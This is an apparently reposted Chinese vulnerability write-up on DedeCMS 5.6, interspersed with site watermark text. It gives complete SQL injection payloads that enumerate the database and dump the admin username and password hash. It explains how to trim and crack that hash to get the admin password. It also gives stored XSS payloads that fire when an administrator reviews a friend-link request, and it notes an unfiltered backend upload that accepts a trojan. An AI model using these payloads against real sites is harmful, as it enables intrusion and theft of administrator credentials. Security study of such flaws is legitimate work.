dedecms5.6 SQL注入、Xss、文件上传漏洞

2019-03-2907:29:16网站建设与开发Comments4,081 views字数 1182阅读模式

SQL注入漏洞1

注入点:
完整payload:文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

1',1,2,3,4,5,@`'`),((select database()),(select 1),'4

访问 查询出信息
当前数据库信息dedecmsv56gbk文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4

查出表名 dede_admin文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4

dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片1 sql注入漏洞1
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

SQL注入漏洞2

注入点:'
Payload:' union select 1,2,3,database(),5,6,7,8,9%23文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片2 sql注入漏洞2
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

SQL注入漏洞3

参考链接
注册用户在笔名中添加如下字符文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

',char(@`'`),0,0,database(),0,0)#

然后添加一个好友 触发数据库查询,再回到我的织梦中即可看到查询出的数据
dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片3 sql注入漏洞3
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

SQL注入漏洞4

参考链接:
注入点:
[type][tmp_name]=
漏洞利用payload文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=[type][type]=application/octet-stream&_FILES[type][size]=4294

dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片4 sql注入漏洞4
如果是32位MD5减去头5位,减去尾七位
如果是20位MD5密码,前减3后减1,得到16位MD5
将得到的23a7bbd73250516f069d处理后得到7bbd73250516f069,放到cmd5解密得到admin的密码为admin123文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

0x01 Xss漏洞

Xss漏洞1:

完整payload:

漏洞证明:
dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片5 xss漏洞1
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

XSS漏洞2

参考链接:文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

普通用户申请友情链接,在网站logo处添加文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

'" onerror=alert(1);//

dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片6 xss漏洞2填写信息
触发条件:后台管理员登陆查看友情链接申请触发xss
漏洞证明:
dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片7 xss漏洞2触发证明
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

0x02文件上传漏洞

1,在后台页面文件式管理处,点击上传文件,直接上传木马,没有过滤。
dedecms5.6 SQL注入、Xss、文件上传漏洞文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html

图片8 文件上传漏洞点
文章源自菜鸟学院-https://www.cainiaoxueyuan.com/cms/10581.html
  • 本站内容整理自互联网,仅提供信息存储空间服务,以方便学习之用。如对文章、图片、字体等版权有疑问,请在下方留言,管理员看到后,将第一时间进行处理。
  • 转载请务必保留本文链接:https://www.cainiaoxueyuan.com/cms/10581.html

Comment

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定